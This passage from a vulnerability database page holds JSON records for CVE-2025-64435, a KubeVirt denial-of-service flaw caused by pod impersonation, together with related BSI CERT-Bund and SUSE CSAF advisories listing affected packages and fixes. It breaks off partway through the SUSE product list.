Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-64435 (GCVE-0-2025-64435)
Vulnerability from cvelistv5 – Published: 2025-11-07 22:57 – Updated: 2025-11-10 19:01- CWE-703 - Improper Check or Handling of Exceptional Conditions
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-64435",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-10T19:00:48.220627Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-10T19:01:13.977Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "kubevirt",
"vendor": "kubevirt",
"versions": [
{
"status": "affected",
"version": "\u003c 1.7.0-beta.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T22:57:02.600Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9"
},
{
"name": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba"
}
],
"source": {
"advisory": "GHSA-9m94-w2vq-hcf9",
"discovery": "UNKNOWN"
},
"title": "KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-64435",
"datePublished": "2025-11-07T22:57:02.600Z",
"dateReserved": "2025-11-03T22:12:51.365Z",
"dateUpdated": "2025-11-10T19:01:13.977Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-64435\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-07T23:15:45.850\",\"lastModified\":\"2025-11-25T17:15:44.140\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.\"},{\"lang\":\"es\",\"value\":\"KubeVirt es un complemento de gesti\u00f3n de m\u00e1quinas virtuales para Kubernetes. Antes de la versi\u00f3n 1.7.0-beta.0, un fallo l\u00f3gico en el virt-controller permite a un atacante interrumpir el control sobre una VMI en ejecuci\u00f3n al crear un pod con las mismas etiquetas que el pod virt-launcher leg\u00edtimo asociado a la VMI. Esto puede inducir a error al virt-controller para que asocie el pod falso con la VMI, lo que resulta en actualizaciones de estado incorrectas y potencialmente causando un DoS (Denial-of-Service). Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 1.7.0-beta.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-703\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*\",\"versionEndIncluding\":\"1.6.3\",\"matchCriteriaId\":\"5115F453-4A3D-438D-A8F3-94C5E8451F45\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:kubevirt:kubevirt:1.7.0:alpha0:*:*:*:kubernetes:*:*\",\"matchCriteriaId\":\"6C13B76B-290B-4D75-AF75-54FEC43B75C4\"}]}]}],\"references\":[{\"url\":\"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64435\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-10T19:00:48.220627Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-10T19:00:55.699Z\"}}], \"cna\": {\"title\": \"KubeVirt VMI Denial-of-Service (DoS) Using Pod Impersonation\", \"source\": {\"advisory\": \"GHSA-9m94-w2vq-hcf9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"kubevirt\", \"product\": \"kubevirt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.7.0-beta.0\"}]}], \"references\": [{\"url\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\", \"name\": \"https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\", \"name\": \"https://github.com/kubevirt/kubevirt/commit/9a6f4a3a707992038ef705da4cb3bba8c89d36ba\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-703\", \"description\": \"CWE-703: Improper Check or Handling of Exceptional Conditions\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-07T22:57:02.600Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-64435\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-10T19:01:13.977Z\", \"dateReserved\": \"2025-11-03T22:12:51.365Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-07T22:57:02.600Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
WID-SEC-W-2025-2563
Vulnerability from csaf_certbund - Published: 2025-11-11 23:00 - Updated: 2025-12-14 23:00Notes
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Microsoft Azure Linux ist eine von Microsoft entwickelte Linux-Distribution, die f\u00fcr die Ausf\u00fchrung von Workloads in der Azure-Cloud optimiert ist.\r\nWindows ist ein Betriebssystem von Microsoft.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in Microsoft Azure Linux und Microsoft Windows ausnutzen um erh\u00f6hte Privilegien zu erlangen, beliebigen Code auszuf\u00fchren, die Authentifizierung zu umgehen, Spoofing-Angriffe durchzuf\u00fchren, einen Denial-of-Service-Zustand zu verursachen oder andere, nicht n\u00e4her spezifizierte Angriffe durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-2563 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-2563.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-2563 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2563"
},
{
"category": "external",
"summary": "Microsoft Leitfaden f\u00fcr Sicherheitsupdates",
"url": "https://msrc.microsoft.com/update-guide/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:4288-1 vom 2025-11-28",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2I3DAC5P7RIJP4M7YPNYJVIE4ZG7RSHV/"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-2F6CA95A74 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-2f6ca95a74"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-7C468696D2 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-7c468696d2"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-D39F46567C vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-d39f46567c"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2025-2CA3289343 vom 2025-12-13",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2025-2ca3289343"
}
],
"source_lang": "en-US",
"title": "Microsoft Azure Linux: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-12-14T23:00:00.000+00:00",
"generator": {
"date": "2025-12-15T10:15:06.656+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2025-2563",
"initial_release_date": "2025-11-11T23:00:00.000+00:00",
"revision_history": [
{
"date": "2025-11-11T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-11-30T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2025-12-14T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Fedora aufgenommen"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Fedora Linux",
"product": {
"name": "Fedora Linux",
"product_id": "74185",
"product_identification_helper": {
"cpe": "cpe:/o:fedoraproject:fedora:-"
}
}
}
],
"category": "vendor",
"name": "Fedora"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "azl3 nghttp2 1.61.0-2 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 nghttp2 1.61.0-2 on 3.0",
"product_id": "T048506",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_nghttp2_1.61.0-2_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 libarchive 3.7.7-3 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 libarchive 3.7.7-3 on 3.0",
"product_id": "T048507",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_libarchive_3.7.7-3_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 kernel 6.6.104.2-4 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 kernel 6.6.104.2-4 on 3.0",
"product_id": "T048508",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_kernel_6.6.104.2-4_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 curl 8.11.1-4 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 curl 8.11.1-4 on 3.0",
"product_id": "T048509",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_curl_8.11.1-4_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 cmake 3.30.3-10 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 cmake 3.30.3-10 on 3.0",
"product_id": "T048510",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_cmake_3.30.3-10_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 mysql 8.0.44-2 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 mysql 8.0.44-2 on 3.0",
"product_id": "T048512",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_mysql_8.0.44-2_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 libxml2 2.11.5-7 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 libxml2 2.11.5-7 on 3.0",
"product_id": "T048513",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_libxml2_2.11.5-7_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 rust 1.75.0-21 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 rust 1.75.0-21 on 3.0",
"product_id": "T048514",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_rust_1.75.0-21_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 containerd2 2.0.0-14 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 containerd2 2.0.0-14 on 3.0",
"product_id": "T048515",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_containerd2_2.0.0-14_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 rust 1.86.0-9 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 rust 1.86.0-9 on 3.0",
"product_id": "T048516",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_rust_1.86.0-9_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 kubevirt 1.5.0-5 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 kubevirt 1.5.0-5 on 3.0",
"product_id": "T048517",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_kubevirt_1.5.0-5_on_3.0"
}
}
},
{
"category": "product_version",
"name": "azl3 runc 1.3.3-1 on 3.0",
"product": {
"name": "Microsoft Azure Linux azl3 runc 1.3.3-1 on 3.0",
"product_id": "T048518",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:azure_linux:azl3_runc_1.3.3-1_on_3.0"
}
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Subsystem for Linux GUI",
"product": {
"name": "Microsoft Windows Subsystem for Linux GUI",
"product_id": "T048511",
"product_identification_helper": {
"cpe": "cpe:/o:microsoft:windows:subsystem_for_linux_gui"
}
}
}
],
"category": "product_name",
"name": "Windows"
}
],
"category": "vendor",
"name": "Microsoft"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-25621",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2024-25621"
},
{
"cve": "CVE-2025-10966",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-10966"
},
{
"cve": "CVE-2025-12863",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-12863"
},
{
"cve": "CVE-2025-12875",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-12875"
},
{
"cve": "CVE-2025-31133",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-31133"
},
{
"cve": "CVE-2025-40107",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-40107"
},
{
"cve": "CVE-2025-40109",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-40109"
},
{
"cve": "CVE-2025-52565",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-52565"
},
{
"cve": "CVE-2025-52881",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-52881"
},
{
"cve": "CVE-2025-60753",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-60753"
},
{
"cve": "CVE-2025-62220",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-62220"
},
{
"cve": "CVE-2025-64329",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64329"
},
{
"cve": "CVE-2025-64432",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64435"
},
{
"cve": "CVE-2025-64436",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64436"
},
{
"cve": "CVE-2025-64437",
"product_status": {
"known_affected": [
"74185",
"T048506",
"T048517",
"T048516",
"T048515",
"T048514",
"T002207",
"T048509",
"T048508",
"T048507",
"T048518",
"T048513",
"T048512",
"T048511",
"T048510"
]
},
"release_date": "2025-11-11T23:00:00.000+00:00",
"title": "CVE-2025-64437"
}
]
}
SUSE-SU-2026:0479-1
Vulnerability from csaf_suse - Published: 2026-02-12 15:34 - Updated: 2026-02-12 15:34Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container fixes the following issues:\n\nUpdate to version 1.7.0. (bsc#1257128)\n\n Release notes https://github.com/kubevirt/kubevirt/releases/tag/v1.7.0\n\n- CVE-2025-64435: Fixes logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS (bsc#1253189 )\n- CVE-2024-45310: Fixes kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into creating empty files/directories on host bsc#1257422 \n\n- Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-479,SUSE-SLE-Module-Containers-15-SP7-2026-479",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_0479-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:0479-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260479-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:0479-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024146.html"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container, virt-synchronization-controller-container",
"tracking": {
"current_release_date": "2026-02-12T15:34:08Z",
"generator": {
"date": "2026-02-12T15:34:08Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:0479-1",
"initial_release_date": "2026-02-12T15:34:08Z",
"revision_history": [
{
"date": "2026-02-12T15:34:08Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-container-disk-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-tests-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64",
